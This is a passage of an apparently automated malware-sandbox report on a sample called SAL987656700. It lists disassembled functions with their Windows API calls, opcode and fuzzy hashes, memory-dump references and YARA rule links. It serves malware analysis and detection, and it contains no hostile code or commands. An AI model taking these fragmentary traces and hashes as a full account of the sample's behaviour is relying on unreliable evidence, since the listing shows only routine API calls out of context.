                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID:
                                      • API String ID: 3850602802-0
                                      • Opcode ID: 4811b50233b8ea08c3d36cd5d8f5b2c0944b351eb99f1632f85b321c84323a29
                                      • Instruction ID: 55626c98e512d1fc36bcbca77656d17ff3acff50aaaa0a402a94f19c7fd3d643
                                      • Opcode Fuzzy Hash: 4811b50233b8ea08c3d36cd5d8f5b2c0944b351eb99f1632f85b321c84323a29
                                      • Instruction Fuzzy Hash: 83112A3A901229FFEF109BA5C985FADBB78FB04750F2000A1EA00B7290D7716E50DB94
                                      Function 008EE1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentThreadId.KERNEL32 ref: 008EE1FD
                                      • MessageBoxW.USER32(?,?,?,?), ref: 008EE230
                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 008EE246
                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 008EE24D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                      • String ID:
                                      • API String ID: 2880819207-0
                                      • Opcode ID: 45b4d4511db5a025af952782f13bd924a23fce761acf204c32463c88474b05c3
                                      • Instruction ID: 16fbe46ac6deffde204d78cc83821903585b423eaea991f0844385267e37e708
                                      • Opcode Fuzzy Hash: 45b4d4511db5a025af952782f13bd924a23fce761acf204c32463c88474b05c3
                                      • Instruction Fuzzy Hash: 17112BB6E18358BBC7019FA99C05BDE7FACEB46311F008215F924E3290D2B0CD04D7A0
                                      Function 008AD1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateThread.KERNEL32(00000000,?,008ACFF9,00000000,00000004,00000000), ref: 008AD218
                                      • GetLastError.KERNEL32 ref: 008AD224
                                      • __dosmaperr.LIBCMT ref: 008AD22B
                                      • ResumeThread.KERNEL32(00000000), ref: 008AD249
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Thread$CreateErrorLastResume__dosmaperr
                                      • String ID:
                                      • API String ID: 173952441-0
                                      • Opcode ID: fc8941fd871ee98d3f3e9e8cb0f6e56ccc6012a2c1cd7e39e3a787ca1b60b7f4
                                      • Instruction ID: 9cfe09f81ffd9c3e32d5e909a491bf1efe2b34243035b0eddab892e0649bb769
                                      • Opcode Fuzzy Hash: fc8941fd871ee98d3f3e9e8cb0f6e56ccc6012a2c1cd7e39e3a787ca1b60b7f4
                                      • Instruction Fuzzy Hash: 0B012676504308BBE7106BA9DC09BAE7A68FF83330F104229F926D29D0DFB0D801C6A1
                                      Function 0088600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0088604C
                                      • GetStockObject.GDI32(00000011), ref: 00886060
                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 0088606A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: CreateMessageObjectSendStockWindow
                                      • String ID:
                                      • API String ID: 3970641297-0
                                      • Opcode ID: d926bf662e995624b8a8d0dcfbf3c08c21d295e07289df8396571ccbae460ee4
                                      • Instruction ID: e689921893cac10b195ad7cec285553e1c2141a4802d480b04376e52063cbe46
                                      • Opcode Fuzzy Hash: d926bf662e995624b8a8d0dcfbf3c08c21d295e07289df8396571ccbae460ee4
                                      • Instruction Fuzzy Hash: C211C4B2205908BFEF125F94DC54FEA7B69FF183A4F004105FA04A2120D732DC60EB91
                                      Function 008A3B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • ___BuildCatchObject.LIBVCRUNTIME ref: 008A3B56
                                        • Part of subcall function 008A3AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 008A3AD2
                                        • Part of subcall function 008A3AA3: ___AdjustPointer.LIBCMT ref: 008A3AED
                                      • _UnwindNestedFrames.LIBCMT ref: 008A3B6B
                                      • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 008A3B7C
                                      • CallCatchBlock.LIBVCRUNTIME ref: 008A3BA4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                      • String ID:
                                      • API String ID: 737400349-0
                                      • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                      • Instruction ID: cbd31d306e44f46b4bb01f8b2e77d4f798fb6ccaba96133078a071035dbf21be
                                      • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                      • Instruction Fuzzy Hash: 2B014C32100148BBEF125E99DC42EEB7F6EFF8A764F044014FE48A6521C772E961DBA1
                                      Function 008B3073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,008813C6,00000000,00000000,?,008B301A,008813C6,00000000,00000000,00000000,?,008B328B,00000006,FlsSetValue), ref: 008B30A5
                                      • GetLastError.KERNEL32(?,008B301A,008813C6,00000000,00000000,00000000,?,008B328B,00000006,FlsSetValue,00922290,FlsSetValue,00000000,00000364,?,008B2E46), ref: 008B30B1
                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,008B301A,008813C6,00000000,00000000,00000000,?,008B328B,00000006,FlsSetValue,00922290,FlsSetValue,00000000), ref: 008B30BF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: LibraryLoad$ErrorLast
                                      • String ID:
                                      • API String ID: 3177248105-0
                                      • Opcode ID: 48cd93a4e865bec8153790bb6f6a26dd1e71e92cdf7a5b1e05e7fe8f5cc04f4d
                                      • Instruction ID: d1239b2918e4cbbac7e217198895567082d08f780c299b47c254500ef7f4365c
                                      • Opcode Fuzzy Hash: 48cd93a4e865bec8153790bb6f6a26dd1e71e92cdf7a5b1e05e7fe8f5cc04f4d
                                      • Instruction Fuzzy Hash: 6A01D476759A26ABCB315A79AC449D77B98FF45B61B204620F916E3240CB21D902C6E0
                                      Function 008E7464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 008E747F
                                      • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 008E7497
                                      • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 008E74AC
                                      • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 008E74CA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Type$Register$FileLoadModuleNameUser
                                      • String ID:
                                      • API String ID: 1352324309-0
                                      • Opcode ID: 8ac0c077d15ede32f758c9049d10faa022a485f255b268a7cec988c53b3a059f
                                      • Instruction ID: 202aa587b4c20e2ede52d8ff00e0b5ce4c1d011a29251809d7f007be8a755620
                                      • Opcode Fuzzy Hash: 8ac0c077d15ede32f758c9049d10faa022a485f255b268a7cec988c53b3a059f
                                      • Instruction Fuzzy Hash: 34118BB5349359ABE7208F15EC08B927BFCFB01B08F108569AA16DA1D1D7B0E944DB64
                                      Function 008EB0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,008EACD3,?,00008000), ref: 008EB0C4
                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,008EACD3,?,00008000), ref: 008EB0E9
                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,008EACD3,?,00008000), ref: 008EB0F3
                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,008EACD3,?,00008000), ref: 008EB126
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: CounterPerformanceQuerySleep
                                      • String ID:
                                      • API String ID: 2875609808-0
                                      • Opcode ID: 2ac21fd5ae344c5fdc3d101ad3f253a98fc9d75369fcf2204be0aa1bb5427ee4
                                      • Instruction ID: 997ffddad1a763cb1ad929724018e4092ba1dd1c34f7e8734a90f4c77071fddf
                                      • Opcode Fuzzy Hash: 2ac21fd5ae344c5fdc3d101ad3f253a98fc9d75369fcf2204be0aa1bb5427ee4
                                      • Instruction Fuzzy Hash: CF113C71D4565DEBCF00AFE5E9986EFBB78FF0A721F104085D941B2141DB305550EB51
                                      Function 008E2DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 008E2DC5
                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 008E2DD6
                                      • GetCurrentThreadId.KERNEL32 ref: 008E2DDD
                                      • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 008E2DE4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                      • String ID:
                                      • API String ID: 2710830443-0
                                      • Opcode ID: ebac3ab11af8f663194d7d885039408a0384becfd9f53f368fbd6afbddc0d731
                                      • Instruction ID: 6f93b8a646daf39b2559caf7dfc3542c751f58e9bc85b43e9a684abaea3bdd08
                                      • Opcode Fuzzy Hash: ebac3ab11af8f663194d7d885039408a0384becfd9f53f368fbd6afbddc0d731
                                      • Instruction Fuzzy Hash: 28E06DB17992287AD7201B639C0DEEB3E6CFB43BA1F404215B205D1080DAA08840D6B0
                                      Function 00918863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00899639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00899693
                                        • Part of subcall function 00899639: SelectObject.GDI32(?,00000000), ref: 008996A2
                                        • Part of subcall function 00899639: BeginPath.GDI32(?), ref: 008996B9
                                        • Part of subcall function 00899639: SelectObject.GDI32(?,00000000), ref: 008996E2
                                      • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00918887
                                      • LineTo.GDI32(?,?,?), ref: 00918894
                                      • EndPath.GDI32(?), ref: 009188A4
                                      • StrokePath.GDI32(?), ref: 009188B2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                      • String ID:
                                      • API String ID: 1539411459-0
                                      • Opcode ID: 5e4d0faef48b1b74809e19ddca5156b6eeafee34f922f443d9054589cd49a976
                                      • Instruction ID: 141f8a60f750cbd382cf04169ab2a72871984df842ea86a0301719b73d36d1ad
                                      • Opcode Fuzzy Hash: 5e4d0faef48b1b74809e19ddca5156b6eeafee34f922f443d9054589cd49a976
                                      • Instruction Fuzzy Hash: B5F05E36299258FADF126F94AC0AFCE3F59AF0A311F048040FA11650E1C7755551EFE9
                                      Function 008998B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetSysColor.USER32(00000008), ref: 008998CC
                                      • SetTextColor.GDI32(?,?), ref: 008998D6
                                      • SetBkMode.GDI32(?,00000001), ref: 008998E9
                                      • GetStockObject.GDI32(00000005), ref: 008998F1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Color$ModeObjectStockText
                                      • String ID:
                                      • API String ID: 4037423528-0
                                      • Opcode ID: 9c08eb4720aae3c1676de20aa383c64b8a7c3d1676083ff6a94bac95afb9519d
                                      • Instruction ID: 217bf6244ecd7abfb4b172e6c479a942d77dac9fa432db72c5ae3f8d6b558f6a
                                      • Opcode Fuzzy Hash: 9c08eb4720aae3c1676de20aa383c64b8a7c3d1676083ff6a94bac95afb9519d
                                      • Instruction Fuzzy Hash: B1E03971398280AADB215B78AC09BE83F21EB12336F14C21AF6FA980E1C7714640EB11
                                      Function 008E162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentThread.KERNEL32 ref: 008E1634
                                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,008E11D9), ref: 008E163B
                                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,008E11D9), ref: 008E1648
                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,008E11D9), ref: 008E164F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: CurrentOpenProcessThreadToken
                                      • String ID:
                                      • API String ID: 3974789173-0
                                      • Opcode ID: 39b2b260552890a0cf351f2f53790a5dc30c281b7b38b186168d4f9589befcbc
                                      • Instruction ID: b40df5f69bf02d5d89ae1d577b5d7e370fe622c4611050a747db7fc1145345a9
                                      • Opcode Fuzzy Hash: 39b2b260552890a0cf351f2f53790a5dc30c281b7b38b186168d4f9589befcbc
                                      • Instruction Fuzzy Hash: DDE08CB2796221EBDB201FA1AE0DBC63B7CFF59792F14CC08F245DA090E6348541DB60
                                      Function 008DD858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDesktopWindow.USER32 ref: 008DD858
                                      • GetDC.USER32(00000000), ref: 008DD862
                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 008DD882
                                      • ReleaseDC.USER32(?), ref: 008DD8A3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: CapsDesktopDeviceReleaseWindow
                                      • String ID:
                                      • API String ID: 2889604237-0
                                      • Opcode ID: 59795fb6c2780f58be0b9028c99e835bb0f029729169298040b78b73ea43d2fc
                                      • Instruction ID: d79da5f5b72a7a31798628f6482209af1ba55f1b975e74dc15b0ee80cd737485
                                      • Opcode Fuzzy Hash: 59795fb6c2780f58be0b9028c99e835bb0f029729169298040b78b73ea43d2fc
                                      • Instruction Fuzzy Hash: D8E01AB4A54209EFCF41AFA0D90C6ADBBB1FB08350F14D419E80AE7250CB385901FF50
                                      Function 008DD86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDesktopWindow.USER32 ref: 008DD86C
                                      • GetDC.USER32(00000000), ref: 008DD876
                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 008DD882
                                      • ReleaseDC.USER32(?), ref: 008DD8A3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: CapsDesktopDeviceReleaseWindow
                                      • String ID:
                                      • API String ID: 2889604237-0
                                      • Opcode ID: 6c0c7c8951824d50301b2035849ad67b642ccfc26cd2beefdc4bed9fd27f66b2
                                      • Instruction ID: 92c47614feaadd4f28ad3e7c0e5db1c14b1aeff1449fd72a969ccb66713a8629
                                      • Opcode Fuzzy Hash: 6c0c7c8951824d50301b2035849ad67b642ccfc26cd2beefdc4bed9fd27f66b2
                                      • Instruction Fuzzy Hash: D9E012B4E58209EFCF40AFA0D80C6ADBBB1FB08350B149008E90AE7250CB385A01EF50
                                      Function 008F4D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00887620: _wcslen.LIBCMT ref: 00887625
                                      • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 008F4ED4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Connection_wcslen
                                      • String ID: *$LPT
                                      • API String ID: 1725874428-3443410124
                                      • Opcode ID: cf0c614a89c89fbd42bb7df2729c8491c51d8648e8a714787366f1aa53018498
